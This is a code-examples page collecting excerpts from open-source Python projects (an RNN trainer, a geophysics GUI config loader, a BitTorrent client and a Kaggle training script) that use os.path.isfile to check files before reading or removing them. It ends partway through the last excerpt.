Here are examples of the Python API os.path.isfile, taken from open source projects. By voting up, you can indicate which examples are most useful and appropriate.
157 Examples
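All of the examples on this page follow the same basic shape: test a path with os.path.isfile() before reading, removing, or overwriting it. As a minimal, self-contained sketch (the file name is purely illustrative):

import os

path = "settings.cfg"  # illustrative path
# isfile() is True only for an existing regular file (symlinks are followed);
# directories and missing paths both return False.
if os.path.isfile(path):
    with open(path) as fh:
        data = fh.read()
else:
    data = ""  # fall back to an empty configuration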
Example 51
Project: pycog Source File: trainer.py
def train(self, savefile, task, recover=True):
"""
Train the RNN.
Parameters
----------
savefile : str
task : function
recover : bool, optional
If `True`, will attempt to recover from a previously saved run.
"""
N = self.p['N']
Nin = self.p['Nin']
Nout = self.p['Nout']
alpha = self.p['dt']/self.p['tau']
# Initialize settings
settings = OrderedDict()
# Check if file already exists
if not recover:
if os.path.isfile(savefile):
os.remove(savefile)
#---------------------------------------------------------------------------------
# Are we using GPUs?
#---------------------------------------------------------------------------------
if theanotools.get_processor_type() == 'gpu':
settings['GPU'] = 'enabled'
else:
settings['GPU'] = 'no'
#---------------------------------------------------------------------------------
# Random number generator
#---------------------------------------------------------------------------------
settings['init seed'] = self.p['seed']
rng = np.random.RandomState(self.p['seed'])
#---------------------------------------------------------------------------------
# Weight initialization
#---------------------------------------------------------------------------------
settings['distribution (Win)'] = self.p['distribution_in']
settings['distribution (Wrec)'] = self.p['distribution_rec']
settings['distribution (Wout)'] = self.p['distribution_out']
if Nin > 0:
Win_0 = self.init_weights(rng, self.p['Cin'], N, Nin,
self.p['distribution_in'])
Wrec_0 = self.init_weights(rng, self.p['Crec'],
N, N, self.p['distribution_rec'])
Wout_0 = self.init_weights(rng, self.p['Cout'],
Nout, N, self.p['distribution_out'])
#---------------------------------------------------------------------------------
# Enforce Dale's law on the initial weights
#---------------------------------------------------------------------------------
settings['Nin/N/Nout'] = '{}/{}/{}'.format(Nin, N, Nout)
if self.p['ei'] is not None:
Nexc = len(np.where(self.p['ei'] > 0)[0])
Ninh = len(np.where(self.p['ei'] < 0)[0])
settings['Dale\'s law'] = 'E/I = {}/{}'.format(Nexc, Ninh)
if Nin > 0:
Win_0 = abs(Win_0) # If Dale, assume inputs are excitatory
Wrec_0 = abs(Wrec_0)
Wout_0 = abs(Wout_0)
else:
settings['Dale\'s law'] = 'no'
#---------------------------------------------------------------------------------
# Fix spectral radius
#---------------------------------------------------------------------------------
# Compute spectral radius
C = self.p['Crec']
if C is not None:
Wrec_0_full = C.mask_plastic*Wrec_0 + C.mask_fixed
else:
Wrec_0_full = Wrec_0
if self.p['ei'] is not None:
Wrec_0_full = Wrec_0_full*self.p['ei']
rho = RNN.spectral_radius(Wrec_0_full)
# Scale Wrec to have fixed spectral radius
if self.p['ei'] is not None:
R = self.p['rho0']/rho
else:
R = 1.1/rho
Wrec_0 *= R
if C is not None:
C.mask_fixed *= R
# Check spectral radius
if C is not None:
Wrec_0_full = C.mask_plastic*Wrec_0 + C.mask_fixed
else:
Wrec_0_full = Wrec_0
if self.p['ei'] is not None:
Wrec_0_full = Wrec_0_full*self.p['ei']
rho = RNN.spectral_radius(Wrec_0_full)
settings['initial spectral radius'] = '{:.2f}'.format(rho)
#---------------------------------------------------------------------------------
# Others
#---------------------------------------------------------------------------------
brec_0 = self.p['brec']*np.ones(N)
bout_0 = self.p['bout']*np.ones(Nout)
x0_0 = self.p['x0']*np.ones(N)
#---------------------------------------------------------------------------------
# RNN parameters
#---------------------------------------------------------------------------------
if Nin > 0:
Win = theanotools.shared(Win_0, name='Win')
else:
Win = None
Wrec = theanotools.shared(Wrec_0, name='Wrec')
Wout = theanotools.shared(Wout_0, name='Wout')
brec = theanotools.shared(brec_0, name='brec')
bout = theanotools.shared(bout_0, name='bout')
x0 = theanotools.shared(x0_0, name='x0')
#---------------------------------------------------------------------------------
# Parameters to train
#---------------------------------------------------------------------------------
trainables = []
if Win is not None:
trainables += [Win]
trainables += [Wrec]
if Wout is not None:
trainables += [Wout]
if self.p['train_brec']:
settings['train recurrent bias'] = 'yes'
trainables += [brec]
else:
settings['train recurrent bias'] = 'no'
if self.p['train_bout']:
settings['train output bias'] = 'yes'
trainables += [bout]
else:
settings['train output bias'] = 'no'
# In continuous mode it doesn't make sense to train x0, which is forgotten
if self.p['mode'] == 'continuous':
self.p['train_x0'] = False
if self.p['train_x0']:
settings['train initial conditions'] = 'yes'
trainables += [x0]
else:
settings['train initial conditions'] = 'no'
#---------------------------------------------------------------------------------
# Weight matrices
#---------------------------------------------------------------------------------
# Input
if Nin > 0:
if self.p['Cin'] is not None:
C = self.p['Cin']
settings['sparseness (Win)'] = ('p = {:.2f}, p_plastic = {:.2f}'
.format(C.p, C.p_plastic))
Cin_mask_plastic = theanotools.shared(C.mask_plastic)
Cin_mask_fixed = theanotools.shared(C.mask_fixed)
Win_ = Cin_mask_plastic*Win + Cin_mask_fixed
Win_.name = 'Win_'
else:
Win_ = Win
# Recurrent
if self.p['Crec'] is not None:
C = self.p['Crec']
settings['sparseness (Wrec)'] = ('p = {:.2f}, p_plastic = {:.2f}'
.format(C.p, C.p_plastic))
Crec_mask_plastic = theanotools.shared(C.mask_plastic)
Crec_mask_fixed = theanotools.shared(C.mask_fixed)
Wrec_ = Crec_mask_plastic*Wrec + Crec_mask_fixed
Wrec_.name = 'Wrec_'
else:
Wrec_ = Wrec
# Output
if self.p['Cout'] is not None:
C = self.p['Cout']
settings['sparseness (Wout)'] = ('p = {:.2f}, p_plastic = {:.2f}'
.format(C.p, C.p_plastic))
Cout_mask_plastic = theanotools.shared(C.mask_plastic)
Cout_mask_fixed = theanotools.shared(C.mask_fixed)
Wout_ = Cout_mask_plastic*Wout + Cout_mask_fixed
Wout_.name = 'Wout_'
else:
Wout_ = Wout
#---------------------------------------------------------------------------------
# Dale's law
#---------------------------------------------------------------------------------
if self.p['ei'] is not None:
# Function to keep matrix elements positive
if self.p['ei_positive_func'] == 'abs':
settings['E/I positivity function'] = 'absolute value'
make_positive = abs
elif self.p['ei_positive_func'] == 'rectify':
settings['E/I positivity function'] = 'rectify'
make_positive = theanotools.rectify
else:
raise ValueError("Unknown ei_positive_func.")
# Assume inputs are excitatory
if Nin > 0:
Win_ = make_positive(Win_)
# E/I
ei = theanotools.shared(self.p['ei'], name='ei')
Wrec_ = make_positive(Wrec_)*ei
Wout_ = make_positive(Wout_)*ei
#---------------------------------------------------------------------------------
# Variables to save
#---------------------------------------------------------------------------------
if Nin > 0:
save_values = [Win_]
else:
save_values = [None]
save_values += [Wrec_, Wout_, brec, bout, x0]
#---------------------------------------------------------------------------------
# Activation functions
#---------------------------------------------------------------------------------
f_hidden, d_f_hidden = theanotools.hidden_activations[self.p['hidden_activation']]
settings['hidden activation'] = self.p['hidden_activation']
act = self.p['output_activation']
f_output = theanotools.output_activations[act]
if act == 'sigmoid':
settings['output activation/loss'] = 'sigmoid/binary cross entropy'
f_loss = theanotools.binary_crossentropy
elif act == 'softmax':
settings['output activation/loss'] = 'softmax/categorical cross entropy'
f_loss = theanotools.categorical_crossentropy
else:
settings['output activation/loss'] = act + '/squared'
f_loss = theanotools.L2
#---------------------------------------------------------------------------------
# RNN
#---------------------------------------------------------------------------------
# Dims: time, trials, units
# u[:,:,:Nin] contains the inputs (including baseline and noise),
# u[:,:,Nin:] contains the recurrent noise
u = T.tensor3('u')
x0_ = T.alloc(x0, u.shape[1], x0.shape[0])
if Nin > 0:
def rnn(u_t, x_tm1, r_tm1, WinT, WrecT):
x_t = ((1 - alpha)*x_tm1
+ alpha*(T.dot(r_tm1, WrecT) # Recurrent
+ brec # Bias
+ T.dot(u_t[:,:Nin], WinT) # Input
+ u_t[:,Nin:]) # Recurrent noise
)
r_t = f_hidden(x_t)
return [x_t, r_t]
[x, r], _ = theano.scan(fn=rnn,
outputs_info=[x0_, f_hidden(x0_)],
sequences=u,
non_sequences=[Win_.T, Wrec_.T])
else:
def rnn(u_t, x_tm1, r_tm1, WrecT):
x_t = ((1 - alpha)*x_tm1
+ alpha*(T.dot(r_tm1, WrecT) # Recurrent
+ brec # Bias
+ u_t[:,Nin:]) # Recurrent noise
)
r_t = f_hidden(x_t)
return [x_t, r_t]
[x, r], _ = theano.scan(fn=rnn,
outputs_info=[x0_, f_hidden(x0_)],
sequences=u,
non_sequences=[Wrec_.T])
#---------------------------------------------------------------------------------
# Running mode
#---------------------------------------------------------------------------------
if self.p['mode'] == 'continuous':
settings['mode'] = 'continuous'
if self.p['n_gradient'] != 1:
print("[ Trainer.train ] In continuous mode,"
" so we're setting n_gradient to 1.")
self.p['n_gradient'] = 1
x0_ = x[-1]
else:
settings['mode'] = 'batch'
#---------------------------------------------------------------------------------
# Readout
#---------------------------------------------------------------------------------
z = f_output(T.dot(r, Wout_.T) + bout)
#---------------------------------------------------------------------------------
# Deduce whether the task specification contains an output mask -- use a
# temporary dataset so it doesn't affect the training.
#---------------------------------------------------------------------------------
dataset = Dataset(1, task, self.floatX, self.p, name='gradient')
if dataset.has_output_mask():
settings['output mask'] = 'yes'
else:
settings['output mask'] = 'no'
#---------------------------------------------------------------------------------
# Loss
#---------------------------------------------------------------------------------
# (time, trials, outputs)
target = T.tensor3('target')
# Set mask
mask = target[:,:,Nout:]
masknorm = T.sum(mask)
# Input-output pairs
inputs = [u, target]
# target[:,:,:Nout] contains the target outputs, &
# target[:,:,Nout:] contains the mask.
# Loss, not including the regularization terms
loss = T.sum(f_loss(z, target[:,:,:Nout])*mask)/masknorm
# Root-mean-squared error
error = T.sqrt(T.sum(theanotools.L2(z, target[:,:,:Nout])*mask)/masknorm)
#---------------------------------------------------------------------------------
# Regularization terms
#---------------------------------------------------------------------------------
regs = 0
#---------------------------------------------------------------------------------
# L1 weight regularization
#---------------------------------------------------------------------------------
lambda1 = self.p['lambda1_in']
if lambda1 > 0:
settings['L1 weight regularization (Win)'] = ('lambda1_in = {}'
.format(lambda1))
regs += lambda1 * T.mean(abs(Win))
lambda1 = self.p['lambda1_rec']
if lambda1 > 0:
settings['L1 weight regularization (Wrec)'] = ('lambda1_rec = {}'
.format(lambda1))
regs += lambda1 * T.mean(abs(Wrec))
lambda1 = self.p['lambda1_out']
if lambda1 > 0:
settings['L1 weight regularization (Wout)'] = ('lambda1_out = {}'
.format(lambda1))
regs += lambda1 * T.mean(abs(Wout))
#---------------------------------------------------------------------------------
# L2 weight regularization
#---------------------------------------------------------------------------------
if Nin > 0:
lambda2 = self.p['lambda2_in']
if lambda2 > 0:
settings['L2 weight regularization (Win)'] = ('lambda2_in = {}'
.format(lambda2))
regs += lambda2 * T.mean(Win**2)
lambda2 = self.p['lambda2_rec']
if lambda2 > 0:
settings['L2 weight regularization (Wrec)'] = ('lambda2_rec = {}'
.format(lambda2))
regs += lambda2 * T.mean(Wrec**2)
lambda2 = self.p['lambda2_out']
if lambda2 > 0:
settings['L2 weight regularization (Wout)'] = ('lambda2_out = {}'
.format(lambda2))
regs += lambda2 * T.mean(Wout**2)
#---------------------------------------------------------------------------------
# L2 rate regularization
#---------------------------------------------------------------------------------
lambda2 = self.p['lambda2_r']
if lambda2 > 0:
settings['L2 rate regularization'] = 'lambda2_r = {}'.format(lambda2)
regs += lambda2 * T.mean(r**2)
#---------------------------------------------------------------------------------
# Final costs
#---------------------------------------------------------------------------------
costs = [loss, error]
#---------------------------------------------------------------------------------
# Datasets
#---------------------------------------------------------------------------------
gradient_data = Dataset(self.p['n_gradient'], task, self.floatX, self.p,
batch_size=self.p['gradient_batch_size'],
seed=self.p['gradient_seed'],
name='gradient')
validation_data = Dataset(self.p['n_validation'], task, self.floatX, self.p,
batch_size=self.p['validation_batch_size'],
seed=self.p['validation_seed'],
name='validation')
# Input noise
if np.isscalar(self.p['var_in']):
if Nin > 0:
settings['sigma_in'] = '{}'.format(np.sqrt(self.p['var_in']))
else:
settings['sigma_in'] = 'array'
# Recurrent noise
if np.isscalar(self.p['var_rec']):
settings['sigma_rec'] = '{}'.format(np.sqrt(self.p['var_rec']))
else:
settings['sigma_rec'] = 'array'
# Dataset settings
settings['rectify inputs'] = self.p['rectify_inputs']
settings['gradient minibatch size'] = gradient_data.minibatch_size
settings['validation minibatch size'] = validation_data.minibatch_size
#---------------------------------------------------------------------------------
# Other settings
#---------------------------------------------------------------------------------
settings['dt'] = '{} ms'.format(self.p['dt'])
if np.isscalar(self.p['tau']):
settings['tau'] = '{} ms'.format(self.p['tau'])
else:
settings['tau'] = 'custom'
settings['tau_in'] = '{} ms'.format(self.p['tau_in'])
settings['learning rate'] = '{}'.format(self.p['learning_rate'])
settings['lambda_Omega'] = '{}'.format(self.p['lambda_Omega'])
settings['max gradient norm'] = '{}'.format(self.p['max_gradient_norm'])
#---------------------------------------------------------------------------------
# A few important Theano settings
#---------------------------------------------------------------------------------
settings['(Theano) floatX'] = self.floatX
settings['(Theano) allow_gc'] = theano.config.allow_gc
#---------------------------------------------------------------------------------
# Train!
#---------------------------------------------------------------------------------
print_settings(settings)
sgd = SGD(trainables, inputs, costs, regs, x, z, self.p, save_values,
{'Wrec_': Wrec_, 'd_f_hidden': d_f_hidden})
sgd.train(gradient_data, validation_data, savefile)
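The isfile() call in this trainer guards a destructive operation: a previous save file is deleted only when it actually exists and recovery was not requested. Reduced to a hedged sketch with illustrative names:

import os

def prepare_savefile(savefile, recover=True):
    # Starting fresh: remove a stale save file if one is present.
    # Without the isfile() check, os.remove() would raise FileNotFoundError.
    if not recover and os.path.isfile(savefile):
        os.remove(savefile)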
Example 52
Project: mtpy Source File: occamgui_v1.py
def load_old_configfile(self):
old_cfg_filename = self.ui.lineEdit_browse_configfile.text()
#if not a proper file: do nothing
try:
if not op.isfile(old_cfg_filename):
raise
except:
messagetext = ''
messagetext += "<P><FONT COLOR='#000000'>File name: "\
"{0} </FONT></P> \n".format(old_cfg_filename)
messagetext += "<P><b><FONT COLOR='#800000'>Error: Not a valid "\
"configuration file </FONT></b></P> \n"
QtGui.QMessageBox.about(self, "Reading configuration file", messagetext)
return
#try to read config file into dictionary:
parameters = {}
try:
#to test, if file is readable:
with open(old_cfg_filename) as F:
data = F.read()
temp_dict_outer = MTcf.read_configfile(old_cfg_filename)
if len(temp_dict_outer) == 0:
raise
for k,v in temp_dict_outer.items():
temp_dict_inner = v
parameters.update(temp_dict_inner)
except:
messagetext = ''
messagetext += "<P><FONT COLOR='#000000'>File name: "\
"{0} </FONT></P> \n".format(old_cfg_filename)
messagetext += "<P><b><FONT COLOR='#800000'>Error: File not valid or "\
"not readable </FONT></b></P> \n"
QtGui.QMessageBox.about(self, "Reading configuration file", messagetext)
return
#now go through all parameters and see if they are contained in the config file
#if yes, update the values in the fields
update_counter = 0
if 'block_merge_threshold' in parameters:
try:
value = float(parameters['block_merge_threshold'])
self.ui.doubleSpinBox_mergethreshold.setValue(value)
update_counter += 1
except:
pass
if 'datafile' in parameters:
try:
value = str(parameters['datafile'])
self.ui.lineEdit_browse_datafile.setText(value)
update_counter += 1
except:
pass
if 'debug_level' in parameters:
d = {'0':0,'1':1,'2':2 }
try:
value = str(int(float((parameters['debug_level'])))).lower()
self.ui.comboBox_debuglevel.setCurrentIndex(int(d[value]))
update_counter += 1
except:
pass
if 'edi_directory' in parameters:
try:
value = str(parameters['edi_directory'])
self.ui.lineEdit_browse_edi.setText(value)
update_counter += 1
except:
pass
if 'edi_type' in parameters:
d = {'z':0,'resphase':1,'spectra':2 }
try:
value = str(parameters['edi_type']).lower()
self.ui.comboBox_edi_type.setCurrentIndex(int(d[value]))
update_counter += 1
except:
pass
if 'firstlayer_thickness' in parameters:
try:
value = float(parameters['firstlayer_thickness'])
self.ui.spinBox_firstlayer.setValue(value)
update_counter += 1
except:
pass
if 'halfspace_resistivity' in parameters:
try:
value = float(parameters['halfspace_resistivity'])
self.ui.doubleSpinBox_rhostart.setValue(value)
update_counter += 1
except:
pass
if 'max_blockwidth' in parameters:
try:
value = float(parameters['max_blockwidth'])
self.ui.spinBox_maxblockwidth.setValue(value)
update_counter += 1
except:
pass
if 'max_no_frequencies' in parameters:
try:
value = str(parameters['max_no_frequencies'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_max_no_frequencies.setCheckState(0)
self.ui.spinBox_max_no_frequencies.setValue(0)
else:
value = int(float(value))
self.ui.checkBox_max_no_frequencies.setCheckState(2)
self.ui.spinBox_max_no_frequencies.setValue(value)
update_counter += 1
except:
self.ui.checkBox_max_no_frequencies.setCheckState(0)
if 'max_frequency' in parameters:
try:
value = str(parameters['max_frequency'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_max_frequency.setCheckState(0)
self.ui.doubleSpinBox_max_frequency.setValue(0)
else:
value = int(float(value))
self.ui.checkBox_max_frequency.setCheckState(2)
self.ui.doubleSpinBox_max_frequency.setValue(value)
update_counter += 1
except:
self.ui.checkBox_max_frequency.setCheckState(0)
if 'min_frequency' in parameters:
try:
value = str(parameters['min_frequency'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_min_frequency.setCheckState(0)
self.ui.doubleSpinBox_min_frequency.setValue(0)
else:
value = int(float(value))
self.ui.checkBox_min_frequency.setCheckState(2)
self.ui.doubleSpinBox_min_frequency.setValue(value)
update_counter += 1
except:
self.ui.checkBox_min_frequency.setCheckState(0)
if 'max_no_iterations' in parameters:
try:
value = int(float(parameters['max_no_iterations']))
self.ui.spinBox_max_no_iterations.setValue(value)
update_counter += 1
except:
pass
if 'mode' in parameters:
d = {'both':0,'tm':1,'te':2, 'tipper':3, 'all':4 }
try:
value = None
raw_value = str(parameters['mode']).lower()
if 'te' in raw_value:
value = 'te'
if 'tm' in raw_value:
value = 'both'
elif 'tm' in raw_value:
value = 'tm'
if 'both' in raw_value:
value = 'both'
elif 'tipper' in raw_value:
value = 'tipper'
if 'all' in raw_value:
value = 'all'
self.ui.comboBox_mode.setCurrentIndex(int(d[value]))
update_counter += 1
except:
pass
if 'model_name' in parameters:
try:
value = str(parameters['model_name'])
self.ui.lineEdit_modelname.setText(value)
update_counter += 1
except:
pass
if 'mu_start' in parameters:
try:
value = float(parameters['mu_start'])
self.ui.doubleSpinBox_lagrange.setValue(value)
update_counter += 1
except:
pass
if 'no_iteration' in parameters:
try:
value = int(float(parameters['no_iteration']))
self.ui.spinBox_iterationstep.setValue(value)
update_counter += 1
except:
pass
if 'no_layers' in parameters:
try:
value = int(float(parameters['no_layers']))
self.ui.spinBox_no_layers.setValue(value)
update_counter += 1
except:
pass
if 'phase_errorfloor' in parameters:
try:
value = (parameters['phase_errorfloor'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_phase_error.setCheckState(0)
self.ui.doubleSpinBox_phase_error.setValue(15)
else:
value = float(value)
self.ui.checkBox_phase_error.setCheckState(2)
self.ui.doubleSpinBox_phase_error.setValue(value)
update_counter += 1
except:
self.ui.checkBox_phase_error.setCheckState(0)
if 'reached_misfit' in parameters:
try:
value = int(float(parameters['reached_misfit']))
if value == 0:
self.ui.checkBox_misfitreached.setCheckState(0)
else:
self.ui.checkBox_misfitreached.setCheckState(2)
update_counter += 1
except:
self.ui.checkBox_misfitreached.setCheckState(0)
if 'rho_errorfloor' in parameters:
try:
value = (parameters['rho_errorfloor'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_rho_error.setCheckState(0)
self.ui.doubleSpinBox_rho_error.setValue(10)
else:
value = float(value)
self.ui.checkBox_rho_error.setCheckState(2)
self.ui.doubleSpinBox_rho_error.setValue(value)
update_counter += 1
except:
self.ui.checkBox_rho_error.setCheckState(0)
if 'tipper_errorfloor' in parameters:
try:
value = (parameters['tipper_errorfloor'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_tipper_error.setCheckState(0)
self.ui.doubleSpinBox_tipper_error.setValue(10)
else:
value = float(value)
self.ui.checkBox_tipper_error.setCheckState(2)
self.ui.doubleSpinBox_tipper_error.setValue(value)
update_counter += 1
except:
self.ui.checkBox_tipper_error.setCheckState(0)
if 'strike' in parameters:
try:
value = (parameters['strike'])
if len(value) == 0 or value.lower().strip() == 'none':
self.ui.checkBox_strike.setCheckState(0)
self.ui.doubleSpinBox_strike.setValue(0)
else:
value = float(value)
self.ui.checkBox_strike.setCheckState(2)
self.ui.doubleSpinBox_strike.setValue(value)
update_counter += 1
except:
self.ui.checkBox_strike.setCheckState(2)
self.ui.doubleSpinBox_strike.setValue(0)
else:
self.ui.checkBox_strike.setCheckState(0)
self.ui.doubleSpinBox_strike.setValue(0)
if 'target_rms' in parameters:
try:
value = float(parameters['target_rms'])
self.ui.doubleSpinBox_rms.setValue(value)
update_counter += 1
except:
pass
if 'model_depth' in parameters:
try:
value = float(parameters['model_depth'])
self.ui.doubleSpinBox_model_depth.setValue(value)
update_counter += 1
except:
pass
if 'wd' in parameters:
try:
value = str(parameters['wd'])
self.ui.lineEdit_browse_wd.setText(value)
update_counter += 1
except:
pass
messagetext = ''
messagetext += "<P><FONT COLOR='#000000'>Configuration file: "\
"{0} </FONT></P> \n".format(old_cfg_filename)
messagetext += "<P><b><FONT COLOR='#008080'>Read in {0} parameters"\
"</FONT></b></P>".format(update_counter)
QtGui.QMessageBox.about(self, "Update parameters from file", messagetext )
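In this GUI handler os.path is imported under the alias op, and op.isfile() rejects a user-supplied path before the configuration parser ever sees it. A condensed sketch of the same validation (the reader argument stands in for MTcf.read_configfile):

import os.path as op

def load_configfile(filename, reader):
    # Refuse anything that is not an existing regular file
    # before handing it to the parser.
    if not op.isfile(filename):
        raise ValueError("not a valid configuration file: {0}".format(filename))
    return reader(filename)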
Example 53
Project: FriendlyTorrent Source File: tftornado.py
def run(autoDie, shareKill, userName, params):
try:
h = HeadlessDisplayer()
h.autoShutdown = autoDie
h.shareKill = shareKill
h.user = userName
while 1:
try:
config = parse_params(params)
except ValueError, e:
print 'error: ' + str(e) + '\nrun with no args for parameter explanations'
break
if not config:
print get_usage()
break
# log what we are starting up
transferLog("tornado starting up :\n", True)
transferLog(" - torrentfile : " + config['responsefile'] + "\n", True)
transferLog(" - userName : " + userName + "\n", True)
transferLog(" - transferStatFile : " + transferStatFile + "\n", True)
transferLog(" - transferCommandFile : " + transferCommandFile + "\n", True)
transferLog(" - transferLogFile : " + transferLogFile + "\n", True)
transferLog(" - transferPidFile : " + transferPidFile + "\n", True)
transferLog(" - autoDie : " + autoDie + "\n", True)
transferLog(" - shareKill : " + shareKill + "\n", True)
transferLog(" - minport : " + str(config['minport']) + "\n", True)
transferLog(" - maxport : " + str(config['maxport']) + "\n", True)
transferLog(" - max_upload_rate : " + str(config['max_upload_rate']) + "\n", True)
transferLog(" - max_download_rate : " + str(config['max_download_rate']) + "\n", True)
transferLog(" - min_uploads : " + str(config['min_uploads']) + "\n", True)
transferLog(" - max_uploads : " + str(config['max_uploads']) + "\n", True)
transferLog(" - min_peers : " + str(config['min_peers']) + "\n", True)
transferLog(" - max_initiate : " + str(config['max_initiate']) + "\n", True)
transferLog(" - max_connections : " + str(config['max_connections']) + "\n", True)
transferLog(" - super_seeder : " + str(config['super_seeder']) + "\n", True)
transferLog(" - security : " + str(config['security']) + "\n", True)
transferLog(" - auto_kick : " + str(config['auto_kick']) + "\n", True)
if 'crypto_allowed' in config:
transferLog(" - crypto_allowed : " + str(config['crypto_allowed']) + "\n", True)
if 'crypto_only' in config:
transferLog(" - crypto_only : " + str(config['crypto_only']) + "\n", True)
if 'crypto_stealth' in config:
transferLog(" - crypto_stealth : " + str(config['crypto_stealth']) + "\n", True)
transferLog(" - priority : " + str(config['priority']) + "\n", True)
transferLog(" - alloc_type : " + str(config['alloc_type']) + "\n", True)
transferLog(" - alloc_rate : " + str(config['alloc_rate']) + "\n", True)
transferLog(" - buffer_reads : " + str(config['buffer_reads']) + "\n", True)
transferLog(" - write_buffer_size : " + str(config['write_buffer_size']) + "\n", True)
transferLog(" - check_hashes : " + str(config['check_hashes']) + "\n", True)
transferLog(" - max_files_open : " + str(config['max_files_open']) + "\n", True)
transferLog(" - upnp_nat_access : " + str(config['upnp_nat_access']) + "\n", True)
# remove command-file if exists
if isfile(transferCommandFile):
try:
transferLog("removing command-file " + transferCommandFile + "...\n", True)
remove(transferCommandFile)
except:
pass
# write pid-file
currentPid = (str(getpid())).strip()
transferLog("writing pid-file : " + transferPidFile + " (" + currentPid + ")\n", True)
try:
pidFile = open(transferPidFile, 'w')
pidFile.write(currentPid + "\n")
pidFile.flush()
pidFile.close()
except Exception, e:
transferLog("Failed to write pid-file, shutting down : " + transferPidFile + " (" + currentPid + ")" + "\n", True)
break
myid = createPeerID()
seed(myid)
doneflag = Event()
def disp_exception(text):
print text
rawserver = RawServer(doneflag, config['timeout_check_interval'],
config['timeout'], ipv6_enable = config['ipv6_enabled'],
failfunc = h.failed, errorfunc = disp_exception)
upnp_type = UPnP_test(config['upnp_nat_access'])
while True:
try:
listen_port = rawserver.find_and_bind(config['minport'], config['maxport'],
config['bind'], ipv6_socket_style = config['ipv6_binds_v4'],
upnp = upnp_type, randomizer = config['random_port'])
break
except socketerror, e:
if upnp_type and e == UPnP_ERROR:
print 'WARNING: COULD NOT FORWARD VIA UPnP'
upnp_type = 0
continue
print "error: Couldn't listen - " + str(e)
h.failed()
return
response = get_response(config['responsefile'], config['url'], h.error)
if not response:
break
infohash = sha1(bencode(response['info'])).digest()
h.dow = BT1Download(h.display, h.finished, h.error, disp_exception, doneflag,
config, response, infohash, myid, rawserver, listen_port)
if not h.dow.saveAs(h.chooseFile, h.newpath):
break
if not h.dow.initFiles(old_style = True):
break
if not h.dow.startEngine():
h.dow.shutdown()
break
h.dow.startRerequester()
h.dow.autoStats()
if not h.dow.am_I_finished():
h.display(activity = 'connecting to peers')
# log that we are done with startup
transferLog("tornado up and running.\n", True)
# listen forever
rawserver.listen_forever(h.dow.getPortHandler())
# shutdown
h.display(activity = 'shutting down')
h.dow.shutdown()
break
try:
rawserver.shutdown()
except:
pass
if not h.done:
h.failed()
finally:
transferLog("removing pid-file : " + transferPidFile + "\n", True)
try:
remove(transferPidFile)
except:
transferLog("Failed to remove pid-file : " + transferPidFile + "\n", True)
pass
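Here isfile (and remove) are imported directly from os.path and os, so the calls appear unqualified. The stale command-file cleanup boils down to this sketch (the file name is illustrative, and removal errors are ignored as in the original):

from os import remove
from os.path import isfile

def clear_command_file(command_file):
    # Delete a leftover command file from a previous run, if any.
    if isfile(command_file):
        try:
            remove(command_file)
        except OSError:
            pass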
Example 54
Project: kaggle-heart Source File: train.py
def train_model(expid):
metadata_path = MODEL_PATH + "%s.pkl" % expid
if theano.config.optimizer != "fast_run":
print "WARNING: not running in fast mode!"
data_loader.filter_patient_folders()
print "Build model"
interface_layers = config().build_model()
output_layers = interface_layers["outputs"]
input_layers = interface_layers["inputs"]
top_layer = lasagne.layers.MergeLayer(
incomings=output_layers.values()
)
all_layers = lasagne.layers.get_all_layers(top_layer)
all_params = lasagne.layers.get_all_params(top_layer, trainable=True)
if "cutoff_gradients" in interface_layers:
submodel_params = [param for value in interface_layers["cutoff_gradients"] for param in lasagne.layers.get_all_params(value)]
all_params = [p for p in all_params if p not in submodel_params]
if "pretrained" in interface_layers:
for config_name, layers_dict in interface_layers["pretrained"].iteritems():
pretrained_metadata_path = MODEL_PATH + "%s.pkl" % config_name.split('.')[1]
pretrained_resume_metadata = np.load(pretrained_metadata_path)
pretrained_top_layer = lasagne.layers.MergeLayer(
incomings = layers_dict.values()
)
lasagne.layers.set_all_param_values(pretrained_top_layer, pretrained_resume_metadata['param_values'])
num_params = sum([np.prod(p.get_value().shape) for p in all_params])
print string.ljust(" layer output shapes:",36),
print string.ljust("#params:",10),
print string.ljust("#data:",10),
print "output shape:"
for layer in all_layers[:-1]:
name = string.ljust(layer.__class__.__name__, 32)
num_param = sum([np.prod(p.get_value().shape) for p in layer.get_params()])
num_param = string.ljust(int(num_param).__str__(), 10)
num_size = string.ljust(np.prod(layer.output_shape[1:]).__str__(), 10)
print " %s %s %s %s" % (name, num_param, num_size, layer.output_shape)
print " number of parameters: %d" % num_params
obj = config().build_objective(interface_layers)
train_loss_theano = obj.get_loss()
kaggle_loss_theano = obj.get_kaggle_loss()
segmentation_loss_theano = obj.get_segmentation_loss()
validation_other_losses = collections.OrderedDict()
validation_train_loss = obj.get_loss(average=False, deterministic=True, validation=True, other_losses=validation_other_losses)
validation_kaggle_loss = obj.get_kaggle_loss(average=False, deterministic=True, validation=True)
validation_segmentation_loss = obj.get_segmentation_loss(average=False, deterministic=True, validation=True)
xs_shared = {
key: lasagne.utils.shared_empty(dim=len(l_in.output_shape), dtype='float32') for (key, l_in) in input_layers.iteritems()
}
# contains target_vars of the objective! Not the output layers desired values!
# There can be more output layers than are strictly required for the objective
# e.g. for debugging
ys_shared = {
key: lasagne.utils.shared_empty(dim=target_var.ndim, dtype='float32') for (key, target_var) in obj.target_vars.iteritems()
}
learning_rate_schedule = config().learning_rate_schedule
learning_rate = theano.shared(np.float32(learning_rate_schedule[0]))
idx = T.lscalar('idx')
givens = dict()
for key in obj.target_vars.keys():
if key=="segmentation":
givens[obj.target_vars[key]] = ys_shared[key][idx*config().sunny_batch_size : (idx+1)*config().sunny_batch_size]
else:
givens[obj.target_vars[key]] = ys_shared[key][idx*config().batch_size : (idx+1)*config().batch_size]
for key in input_layers.keys():
if key=="sunny":
givens[input_layers[key].input_var] = xs_shared[key][idx*config().sunny_batch_size:(idx+1)*config().sunny_batch_size]
else:
givens[input_layers[key].input_var] = xs_shared[key][idx*config().batch_size:(idx+1)*config().batch_size]
updates = config().build_updates(train_loss_theano, all_params, learning_rate)
#grad_norm = T.sqrt(T.sum([(g**2).sum() for g in theano.grad(train_loss_theano, all_params)]))
#theano_printer.print_me_this("Grad norm", grad_norm)
